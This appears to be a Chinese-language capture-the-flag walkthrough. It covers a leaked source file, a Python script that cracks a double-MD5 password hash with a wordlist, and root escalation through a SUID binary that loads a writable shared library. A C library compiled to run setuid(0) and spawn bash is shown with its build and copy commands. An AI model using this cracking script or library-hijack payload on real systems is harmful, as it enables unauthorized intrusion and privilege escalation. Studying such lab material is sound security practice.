信息泄露,下载源码
可以看到用户和密码,但是密码是双重md5加密的编写脚本破解一下
import hashlib
def double_md5(password, username):
hash1 = hashlib.md5(password.encode()).hexdigest()
hash2 = hashlib.md5(username.encode()).hexdigest()
combined = hash1 + hash2
return hashlib.md5(combined.encode()).hexdigest()
target_hash = "02adcdf2171dc7e5757cdd7c0b91fa03"
username = "admins"
wordlist = "/usr/share/wordlists/rockyou.txt"
with open(wordlist, "r", encoding="latin1") as f:
for line in f:
password = line.strip()
result_hash = double_md5(password, username)
if result_hash == target_hash:
print(f"[+] Password found: {password}")
break
else:
print("[-] Password not found in wordlist.")
admins
admin123
存在一个上传点,审计代码的时候seay也给出了
为了方便使用反弹shell
在家目录中有一个get_root的文件,权限是rws
使用ldd查看get_root的共享库 
现在的条件是 一个 SUID 程序 /home/yulian/get_root,它加载一个可控路径 /usr/lib/sML/libxxoo.so 的共享库
所以可以使用 suid+自定义.so提权
在tmp目录下写入libxxoo.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void __attribute__((constructor)) init() {
FILE *f = fopen("/tmp/xxoo_debug.txt", "w");
if (f) {
fprintf(f, "[+] real UID: %d\n", getuid());
fprintf(f, "[+] effective UID: %d\n", geteuid());
fclose(f);
}
setuid(0);
setgid(0);
system("/bin/bash");
}
gcc -fPIC -shared -o libxxoo.so xxoo.c
cp libxxoo.so /usr/lib/sML/libxxoo.so
chmod 755 /usr/lib/sML/libxxoo.so
/home/yulian/get_root
cat /tmp/xxoo_debug.txt看到了 [+] real UID: 0 [+] effective UID: 0
表示提权生效了
